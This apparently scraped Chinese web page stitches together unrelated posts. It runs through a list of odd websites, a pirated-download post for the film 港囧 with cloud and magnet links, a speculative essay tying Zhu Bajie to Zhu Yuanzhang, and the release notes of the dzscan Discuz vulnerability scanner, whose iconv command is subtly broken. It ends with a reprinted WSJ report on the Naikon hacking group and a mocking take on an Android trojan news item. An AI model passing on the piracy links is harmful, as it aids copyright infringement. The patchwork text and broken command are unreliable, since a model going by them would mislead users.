打进富人榜http://www.globalrichlist.com/
输入收入水平,看看你在地球的财富排行中数老几。很有可能你会惊奇地发现,自己居然属于高收入人群。
【网站名称】:厕所博物馆
【网站链接】:http://www.toiletmuseum.com/
【网站简介】:从厕所涂鸦到马桶设计,从两性如厕研究到厕所的社会功能,我们大便的地方其实并不那么单纯…… 当然, 一定不能错过裘· 德洛等一干名人蹲马桶时的情景
【网站名称】:图片共享现在连
【网站链接】:http://www.flickr.com/
【网站简介】:照片的上传和分享都有软件可以帮你打理完成了. 下载这个免费的软件,然后往里面填好你的链接地址,就可以和全世界的朋友们分享了。如果你乐意,你甚至可以把它们变成海报、画册、甚至是邮票,当然也可以自由浏览他人的作品。
【网站名称】:全体集合
【网站链接】:www.beherenow.cn 快举报我〓我发广告我该死!
【网站简介】:如果你是个沉迷于英式摇滚的偏执狂,祝贺你,终于找到组织了。显然这个世界上偏执狂不止你一个、
【网站名称】:契约游戏
【网站链接】:www.sonypictures.com/movies/thegrudge/site/flash
【网站简介】:这个游戏仅适合看过《咒怨》而且很害怕的兄弟姐妹。不信? 那你试试!
【网站名称】:洋葱
【网站链接】:http://www.theonion.com/content/index
【网站简介】:如果有人说这是美国最好的新闻网站,你可千万别信。因为…… 网站上所有的新闻都是假的,没错,他们是故意的。还不懂吗,生活的最大的笑话就是你认为可信的新闻居然都是假的。
【网站名称】:罗博报告
【网站链接】:http://www.robbreport.com/
【网站简介】:顶级奢侈品的圣经,世界富豪们的每月必读之物。你想拥有吗?,前提是你拥有至少5000万的身价,否则你根本就买不到,因为不会在市场上发行。
系鞋带
http://www.jixiedai.com/
就是一个交各种系鞋带方法的网站,适合萌系,也有系围巾、领带的方式,很简洁的页面
邻居的耳朵 :http://ear.duomi.com/
喜欢听各种音乐的童鞋可以去这个网站去找找看各种音乐推荐很多喜欢音乐的朋友都在这个网站流浪
在线五官生成器:http://www.morphases.com/editor/
很有趣哈哈
搞笑的变形:http://mono-1.com/monoface/main.html
世界上最高的网站之一 :http://wo rlds-hig hest-website .com/
貌似是个技术类网站站长制作的有趣的CSS应用。够长!总共18939公里高!如果你试图用鼠标滚轮看网页最下面的图片,那么我提前告诉你!没有可能!
3.SongTaste - 用音乐倾听彼此
地址:http://www.songtaste.com/
真人版日历:http://www.humancalendar.com/
很有创意的在线真人版日历,所有天数和星期都由人物图片构成,日历上所有的人,都会看着拿今天日期牌子的那个人。
百Google度:http://www.baigoogledu.com/
百度和谷歌野合的产物,据说他们之间平均85%的链接都不一样
最高建筑:http://www.mrwong.de/myhouse/
全世界最高的建筑,come
要你命2007:http://www.meebo.com/
一个小暴发户网站,它把Yahoo、Jabber、Gtalk、AIM、ICQ和MSN几款流行的即时通讯软件整合在一起,支持多款软件之间的信息互通,是名副其实的“聊天要你命2007”。
永远在变的video:http://www.theunseenvideo.com/
它会读取你的IP 地址,以及当地的天气和温度,不同的气候条件下你看到的MV 是不一样的

【网站名称】:路边收集衣
【网站链接】:http://www.pavementgear.com/
【网站简介】:该网站专门收集路边被人丢弃的衣物, 但他绝对不是捡LJ的, 我们怀疑该网站的创始人是个有怪癖的家伙。
【网站名称】:国际爱好洗碗池边进餐者协会
【网站链接】:http://www.sinkie.com/
【网站简介】:据说在洗碗池旁吃饭是一种新的健康饮食方式,鬼晓得是不是真的。不过,可以肯定的是这个网站不仅有众多会员,而且还为此设立了自己的节日。
【网站名称】:可笑可乐
【网站链接】:http://

www.shake

skin.com/
【网站简介】:用吃奶的力气做个鬼脸,然后拍成照片传到网上。结果你得到一个印着你的头像的杯子,而你的脸比杯子把儿弯曲得还厉害。
【网站名称】:经典桌面
【网站链接】:http://www.mydeskcity.com/
【网站简介】:这个名叫东子的偏执狂不知花了多少工夫搜集这些图片,有将近40G 的容量,而且很多图片都是站长本人在国外搜集后,自己进行加工的作品,值得一看。
【网站名称】:抓瞎
【网站链接】:http://www.zhuaxia.com/
【网站简介】:不是抓虾!一个为你精选挑选各种网络资讯的网站,确实省不少时间。
【网站名称】:逆音
【网站链接】:http://www.indieray.com
【网站简介】:闲人一律免进,只献给那些热爱摇滚的孩子们。说不定……你就是其中之一
【网站名称】:电影看个够
【网站链接】:http://www.bittorrent.com
【网站简介】:只要在这里下载一个免费软件,全世界的电影就都成为你的囊中之物。无论它们是老片子还是现在正在播放的片子,记住手要快,因为很快会有人过来叫你把它们删掉。
【网站名称】:头疼试验室
【网站链接】:http://b.muglets.com/
【网站简介】:想不想弄个小人来玩儿?我为你找到一个好去处。没错,就是这个头疼试验室,里面有一位英俊欠扁的帅小伙正等着你折磨。你的主要任务就是想尽一切办法让他头疼,比如喂他吃有毒食品,拿大喇叭吼他,甚至疯狂地给他变换气温……
【网站名称】:画头猪
【网站链接】:http://www.drawapig.desktopcreatures.com/
【网站简介】:在指定的对话框里面随便画一个猪头,然后点击“提交”,之后会得到一份关于你个性的报告。当然,大部分都是臭骂你的话,而在你之前已经有985,871个人乐滋滋地找骂了。
绝对让你High起来的动画 http://www.neave.com/strobe/
打开网站后,点击中间标题进入,盯着中心点看20 秒,然后再看别的地方,据说效果和嗑药差不多,吸毒是违法的,用这个试试嗑药的感觉吧!有趣网址之家提醒您:请不要过渡沉迷与此,毕竟对眼睛不好!
追击行动,寻找章子仪
www.eddy.com.cn/rc/zzy.html
国内作品,为增加恐怖效果,做了一些修改,原理同N0.3一样,这次是找章子仪,当你进入神秘地点触动机关后,意外就来了.这次的鬼跳出来的逼真程度很高,而且结尾幽怨的哭声也很变态,如果设计成无法关闭的页面恐怖程度就是S级以上了。
累死我了  

[caption id="attachment_566" align="aligncenter" width="428"][在线][超清]港囧 6.68G 蓝光原盘 1080P 百度云链接 新增云盘及迅雷链接 [在线][超清]港囧 6.68G 蓝光原盘 1080P 百度云链接 新增云盘及迅雷链接[/caption]
导演 徐峥
编剧 束焕 / 苏亮 / 赵英俊 / 邢爱娜 / 徐峥
主演 徐峥 /赵薇 /包贝尔 /杜鹃 /葛民辉 /李璨琛 /潘虹 /赵有亮 / [url=]显示全部[/url]
类型 喜剧
制片国家 中国大陆
语言 汉语普通话 / 粤语
上映时间 2015-09-25(中国大陆)
片长 114分钟
又名 人再囧途之港囧 / 泰囧续集 / Lost In Hong Kong
评分 豆瓣:6.4
剧情介绍:

徐来(徐峥 饰)曾经的梦想是成为一名画家,可如今他早已沦为理想炮灰,在一家广告公司当小老板。广告公司是岳父开的,他是上门女婿。虽然被全家人尊为最有出息人,但他对俗气的一家人很看不上,并把理想的沦陷归咎于他们。徐来对老婆(赵薇 饰)也一肚子意见。
大学同学会上,徐来听到同学们谈论初恋杨伊(杜鹃 饰),顿时心猿意马。
不日,他陪伴老婆及家人来到香港游玩,计划和多年未见的杨伊偷偷会面,不料却被小舅子拉拉(包贝尔 饰)缠住,拉拉一直梦想成为导演。在拍摄一部以家人为主题的纪录片。在约见初恋的过程中,二人不知不觉卷入了一起坠楼命案。甜蜜的约会之旅,变成了一场惊心动魄的历险与逃亡……
徐来和拉拉,将如何度过香港这难忘的一天?

链接: http://pan.baidu.com/s/1ntxkDWP 密码: 34mz

群组分享1:http://pan.baidu.com/mbox/homepage?short=dDhRT0d

群组分享2:http://pan.baidu.com/mbox/homepage?short=sjN0UML

群组分享3:http://pan.baidu.com/mbox/homepage?short=qWpCZYO

群组分享4:http://pan.baidu.com/mbox/homepage?short=61EA

群组分享5:http://pan.baidu.com/mbox/homepage?short=bnwPdsb

群组分享6:http://pan.baidu.com/mbox/homepage?short=x7eiy

迅雷链接:magnet:?xt=urn:btih:BC3021D4459DE4843555915B60F220A6B709F148

明码链接:http://kuai.xunlei.com/d/hLlsAwLJCgClXQdW811   (累计下载53次)
链接2:http://share.weiyun.com/d4de44fc960946a565c453ffd34486ca(密码:lnlb) (累计下载323次) 已补一次 麻烦下载的朋友 给个评分吧
链接3:http://share.weiyun.com/d4de44fc960946a565c453ffd34486ca  (密码:dXpL)(累计下载432次)

《西游记》中三位徒弟的姓氏,分别是孙、猪、沙。孙,据说是取自“猢狲”的“狲”字,只不过去掉一个反犬旁而已。而沙呢,则与流沙河有莫大关系。可是猪八戒呢?为什么就不能取一个谐音用“朱”,而必须直接用猪呢?

凡事必有缘故,猢狲可以姓孙,老猪却万万不可姓朱,因为大明的皇帝,就姓朱。

《西游记》原本里,说老猪原是神仙界的高层人物,具体官职叫做“天蓬元帅”,其实说白了也就是负责天河的水利工作,并不是真正带兵打仗的军事干部。只是因为革命工作间隙不小心喝醉酒,乃至于动色心居然敢去调戏妇联副主席嫦娥同志,于是触怒了天廷的最高领导人,这被贬到凡间做基层工作,而恰恰在投胎的时候呢,又错投了猪胎,以至于成为一副猪模样的“猪刚鬣”。

神话小说就是如此,可是老猪的原型究竟是谁呢?曾有这么一个传说,说吴承恩的老家淮安有个二流子,名字就叫作朱八,此人又懒又馋,又爱贪小便宜。吴承恩这便把他当作原型,设计出猪八戒这么个人物来。
呵呵,这种传说,估摸着就是街谈巷议的水准,倘若吴承恩真是如此,那么他的构思水准也就仅限于街道办干部乃至乡里文宣干事那一层,如何能写出《西游记》这样的鸿篇巨制来呢?

可为什么说朱元璋会是“猪八戒”原型呢?

首先,你就要知道朱元璋的早期出身,他其实就是一个僧人,17岁他便出家为僧,足足做了七年和尚。

这段经历,后来便成为了朱元璋心中的大忌。据说杭州有个教授,写了篇文章,里头有“光天之下”、“天生圣人”等几个词,朱元璋居然就能看见且牵强附会,说“光”就是光头,“生”就是“僧”,你这是在骂我当过和尚啊!速速拉出去斩了。

好嘛,可见老朱真是当过和尚了,那么他的法号又是什么呢?

据说是叫如净,跟猪八戒的法号悟能似乎有些差距,倒是有点像沙和尚的法号悟净。可你又知否?朱元璋有个叔叔叫朱五六,他的法号就是悟空。哈哈,这便有些名堂了。再想想,朱元璋有个小名,叫做重八,朱重八、猪八戒,这两个名字又有几分相似呢?

再提一句,我们如今在电视剧里看到的猪八戒显然是一头大白猪的喜庆模样,可若是一头野猪呢?苏东坡曾说过:“(猪肉)富家不肯吃,贫家不解煮。”其实一直到宋代,汉人吃的主要肉食都是牛与羊,猪肉属于下层一般劳苦大众没法子才吃的食物,这与整个世界的吃肉习俗都是一致的(伊斯兰世界不吃猪肉,而基督教世界也以牛羊肉为主,佛教世界则干脆不吃肉)。宋朝的使节出使辽国,才看到辽人的酒席之上,居然有猪肉,一问才知道,因为辽人在草原之上,牛羊多而猪少,所谓物以稀为贵,他们这是拿难得的猪肉来招待贵宾。而中原呢?恰恰是以羊肉为美,所以辽宋互市一项最有特色的交易,就是宋朝的猪与辽国的肥羊互换,换完了双方还都很高兴。

到大明万历年间,中国人依旧吃牛羊肉为主,猪肉少见,肉价自然也稍贵些。万历二十年,当时一千斤牛羊肉大概是15两银子,而同等斤两的猪肉,却要20两银子。猪肉比牛羊肉贵,本身就说明国人的饮食,依旧是牛羊肉。

一直要到大清,中国人才不得已改吃猪肉,在当时的美食家袁枚笔下,便出现了“猪用最多,可称‘广大教主’”这样的词句。

而在《西游记》成书的那个年代,猪还曾一度被禁养做家畜,理由很简单,皇帝姓朱,你居然还杀猪,岂不是要造反么?

不许养家猪,那大明的“猪”岂不就是野猪么?《西游记》中的猪八戒,最早的形象就是一头长着獠牙的野猪啊!

事实上,就连大明皇室也把“猪”与“朱”联系起来,也就是说,哪怕你吴承恩的用意,猪八戒就不是朱元璋,明朝的官员也会大怒。

更何况还有一点。不管是家猪还是野猪,长得都不容乐观,而偏偏大明的开国皇帝朱元璋,据说相貌也是极丑——

(朱元璋原貌,左边这张稍加修饰,右边那张就是完全无修饰的真颜)
而且,就在大明开国的洪武年间,朱元璋也曾派和尚去南亚取经,其中有一个叫做慧昙,曾抵达今天的斯里兰卡并死在那里。而后一拨和尚,则成功返回,往返六年光阴,取回了。

更要命的是,还有另一桩事情也很巧合,《西游记》说猪八戒入赘高老庄,而朱元璋呢,也曾被郭子兴招为女婿,其实也算是某种形式的入赘。

还有一个细节,那就是《西游记》中,唐僧每到一个国家,都要去和国王交换外交度牒,还总要宣扬自己来自东土大国,你们有麻烦吗?我可以帮你们搞定——自然,《西游记》中真正的搞定者是他的徒弟孙悟空,唐僧只负责吹牛而已。

这是当年玄奘取经时干的事吗?不!这显然就是大明的官方逻辑。也就是因为这种逻辑,稍后的郑和下西洋,才会一不要你土地、二不要你钱,咱就是来显摆的!

(相比较而言,电视版《西游记》中的八戒,还真是英俊和善呢!)

在朱元璋时代,还曾打印度来了一个叫做“来复”的僧人,他给老朱讲了一大通佛理之后,据说便想回去,可偏偏在出发之际,他写了一首诗给老朱,据说有这么两句:

“殊域及自惭,无德颂陶唐。”

好嘛,老朱立马就脑洞大开了,殊,那不就是“歹朱”吗?无德,这不就是骂我么?好嘞,来复你也甭回去了,小的么,立即把他给我拉出去砍啰!

据说,这位不远万里打印度来到大明的“来复”,就这么被砍了。

如此一来,《西游》会成为大明禁书的缘故,想必你也该明白了吧!

想做这个项目的时候大概在半年前左右,当时写了扫描器的第一版bug多多,虽然至今半年过去了仍没太多的变化,已知的bug就是线程会假死,自定义错误页面会存在预报等等,而且说实在的程序很烂,勉强能跑…

本来的打算是等我的漏洞库存够一百个漏洞就公开项目的,但是看到已经有人发布了类似的小玩意我就觉得没必要藏着掖着了,不如拿出来大家一起维护提意见。

首先是漏洞裤首页http://dzscan.org/ ,因为这里的漏洞全部都是团队成员或者自己独立发现的,所以现在其实并没有多少漏洞,因为一直没有太多的时间去专心的挖漏洞,希望大家知道什么漏洞可以告知我一份,感谢。
codescan@yeah.net 若有朋友有兴趣一起长期做下去也可以联系我。

这里感谢dzscan团队成员的支持 @sin @range @ra0mb1er @ca1n @b 这里也欢迎更多的朋友加入我们。

程序下载地址:https://github.com/code-scan/dzscan

如果adds.txt在linux下存在乱码的问题请执行

iconv -f gb2313 -t utf-8 adds.txt > adds.txt

使用方法:
dzscan.py http://dzscan.org/ thread_num|20
dzscan.py update

来自http://zone.wooyun.org/content/23107

起因是关注到了这篇文章, 来自华尔街日报

////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

任何一个关注中国与其他国家在南中国海(South China Sea, 中国称南海)外交僵局的人都会被这份邮件附件吸引。这份微软Word文档内的文字和照片显示,泰国海军官兵逮捕了越南渔民并迫使他们跪在枪口下。

但这个附件却是一个诱饵:任何打开附件的人会在不知情的情况下下载一个软件,该软件会从他们的电脑中搜索敏感信息并发送到互联网一个不起眼的角落。美国安全研究机构的一份新报告称,掌控这个角落的人是葛星,他是中国一个军事侦查部门的成员。

中国网络部队的触角越伸越远,这已经成为中美关系的一个焦点问题。美国总统奥巴马(Barack Obama)称,在本周中国国家主席习近平对美国的国事访问中,网络安全问题将成为重要议题。

网络空间成为了最新的战争领域,中国不断试探底线的做法已经令美国感到不安。透过有关指称中国军方人员参与黑客行为的报告,可以从细节处审视中国政府操纵的极其庞大的国家网络间谍机器。

葛星似乎并不符合传统意义上的黑客形象。他发表的学术论文显示出他是泰国政治学这门非技术性学科的专家。中国社交媒体上有很多研究人员关注他,上面的多篇帖子显示,他刚刚做了父亲,是一名骑行爱好者,开着一辆白色大众高尔夫(Volkswagen Golf)轿车,偶尔
也会批评一下政府。

网络安全研究公司ThreatConnect和安全咨询公司Defense Group Inc.的报告显示,葛星在互联网其他领域的活动却将他与一个中国黑客团体联系起来,这个黑客团体的攻击目标是一个对于美国而言具有战略意义的领域。

ThreatConnect-DG的I报告有助于外界进一步了解目前中国网络运作鲜为人知的一面:中国军方和一个积极活动的黑客团队之间的关系,这个黑客团队似乎在为中国争取海外利益。

通过据称是葛星的绑定账户,该报告将葛星的工作单位中国人民解放军78020部队和一个名为Naikon的黑客团体直接联系了起来。该部队驻扎在中国西南部,是军方情报部门。安全研究人员表示Naikon已经成功渗透与中国争夺南中国海控制权的国家的主要计算机网络。

从葛星2008年发表的两篇关于泰国政治形势的论文来看,他所属单位为解放军第78020部队。这是一只隶属成都军区的技术侦查部队,驻地昆明。作为中国军队通信情报活动权威人士的维吉尼亚智库Project 2049 Institute执行主任斯托克斯(Mark Stokes)表示,中国人
民解放军共有20多个类似78020部队的建制,其功能为情报收集、分析和电脑网络防御和开发。

成都军区负责维护西藏安全,同时负责中国与越南、缅甸和印度的边境安全。斯托克斯称,成都军区还有一只类似的侦查部队,专门针对与西藏流亡的精神领袖达赖喇嘛(Dalai Lama)有关的网络系统。斯托克斯称,鉴于成都军区边境维稳的任务重心,78020部队去收集南
中国海情报也是合情合理的。

78020部队的宣传办公室工作人员不愿接受采访。成都军区发言人将记者提问转给国防部,但后者未回应置评请求。外交部也未回覆记者的置评请求。

ThreatConnect-DGI报告将这个部队与黑客组织联系起来,因为葛星被指在社交媒体的活动使用的是greensky27这个名字,Naikon网络的部分活动使用的也是这个名字。《华尔街日报》提前看到了这份报告,证实其对葛星社交媒体活动的观察,并且其他证据也将他与
78020部队和Naikon联系起来。

美国网络安全威胁分析企业PassiveTotal为该报告提供了部分数据。该公司研究人员称,报告公平的揭露了有关使用黑客设施的数据如何被用来追踪及确认潜在威胁的情况。

在8月份与《华尔街日报》简短的电话交谈中,葛星证实他在社交媒体上使用greensky27这个名字,但当被告知他是一份报告的研究对象时,他拒绝透露进一步的信息。他说:如果你发表,我就报警。然后他没有听报告的内容就挂断了电话。之后的电话以及提问的短信他
都没有回应。

据ThreatConnect,在《华尔街日报》与葛星的电话一个小时后,greensky27 Naikon域名就停止了活动。最近对这个域名的访问显示域名仍然处于不在线状态。

据研究人员称,Naikon向收件人发送精心制作的电子邮件,一旦打开邮件中的附件便会感染恶意软件。根据俄罗斯杀毒软件公司卡巴斯基实验室(Kaspersky Lab ZAO) 5月份的报告,Naikon曾使用过的病毒附件包括老挝选美小姐日历,分别使用英文和当地文字的新闻报道
和战略性话题备忘录,以及另外一些看上去像是基于机密信息而撰写的备忘录。

卡巴斯基实验室表示,依靠这种被称为钓鱼式攻击的技术,Naikon已渗透至越南、菲律宾和东南亚其他国家的政府网络、军事领域、媒体界和能源公司。该公司首席安全研究员鲍姆加特纳(Kurt Baumgartner)说,这种技术的成功率非常高。只要他们想要入侵,就会得逞

ThreatConnect称,葛星被发现是因为他违反了Naikon的常规运作模式。?了在没有被检测到的情况下取得想盗取的信息,Naikon使用了数百个特殊互联网域名(类似于网页地址),由此连接到互联网上的各个地方。ThreatConnect表示,大部分此类域名似乎都与该组织的
目标国家有关,或者看得出是在故意模仿目标国家的合法网站,greensky27的域名并不符合上述标准。

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

文章中说的, 他是中国一个军事侦查部门的成员。其实全称应该叫, 78020部队技术侦查局, 这个海陆空军警国都有,军队的属于总参情报部, 本身就是情报系统所以搞搞木马什么的就不足为奇了。。

根据历史报告的各种黑客攻击事件, 整理了一个暴露原因汇总

1. 高层有人在出卖小弟, 邱进被退休, 百人窝案。(秘书是潜伏的CIA间谍)

2. 管理人/执行人觉悟不高, 有意无意暴露。

3. 部分体制人员因为条条框框的缘故,视野狭窄,没有安全防护的意识。

4. 遁入对方蜜罐。

5. 工具不达标, 没有证书加密, 收购来的工具技术人员可能为了推广的需要在源码里留下个人信息采购人或者执行人可能并不是太懂技术导致这个信息被分析人员查获。协议未加密可能被人查获控制地址劫持或者反向上传文件反控。

6. 中间环节过多, 可能老大发了一个任务给小弟, 小弟没能力完成, 就花了很廉价的代价请了外援,外援是为了钱, 会管你受不受到谴责的不多。

7. 执行人有意无意暴露, 因为武器核心都是人家的, 在境内又部署有情报网, 很容易结合你泄露的信息+核心部门的硬件后门+潜伏在军方内部的海外谍报人员把你查个底朝天。

8. 个人英雄主义泛滥, 有意暴露, 认为被外媒宣传是好事。

原文来自http://zone.wooyun.org/content/23182

表认为是叶良辰

安卓手机现新病毒:“幽灵推”病毒会隐藏在一些流行工具软件中,如会说话的汤姆猫等,当用户安装非正规渠道下载的这些工具后即中毒,病毒会下载安装一系列恶意程序。安卓手机现新病毒,全球安卓系统沦陷中!

网络安全工程师 刘文柱:它会帮你不断的下载它推广的应用,这个过程中假如说你使用WiFi,它会把你WiFi网络关掉,使用你的3G 4G网络直接消耗你的资费。
“幽灵推”病毒的传播方式和危害与此前发现的众多手机病毒并无区别,不同的是这款病毒有很高的技术含量,它可以直接安装在手机系统里,取得最高权限,这导致杀毒软件根本无法删除它,因为杀毒软件无权更改删除系统文件。

安卓手机现新病毒,网络安全工程师提醒用户,手机如果中了该病毒,可以选择专业的针对该病毒的杀毒工具进行查杀,另外用户下载软件时一定要在正规的网站下载,不要选择在论坛或非法网站。

······························································································································································································································································

刚刚看到标题,吓了老子一跳,以为有什么吊炸天的病毒出现了,看到后面,原来是软广告,危言耸听,还有这个网络安全工程师又是个什么J8玩意,吓死宝宝了!
这个没有传播性的,能叫病毒吗,这只能算是一个技术含量很高的木马,
天朝的专家嘴巴真是厉害啊,一个普普通通的暗装木马都能吹成病毒,
假如你变成僵尸母体了。你不能咬人,不能传播,不会变异,你还有什么用,
然后专家又跑出来说,生化危机来了,世界末日到了
但是其实随便两个普通人都能把你这个僵尸母体KO了

这木马就像老鼠药,可以拌饭吃,也可以拌菜吃,吃不吃在你,
它一直都在,一直都有,吃了它你就会中毒,但不会传播。
这专家他就告诉你吃老鼠药会中毒,中了毒就去医院,注意饮食。

安卓手机现新病毒,网络安全工程师提醒用户,用户如果误吃了老鼠药,可以选择专业的医院针对治疗,另外用户买菜时一定要在正规的超市购买,不要在菜市场或者非法交易。

这就是咱们天朝的专家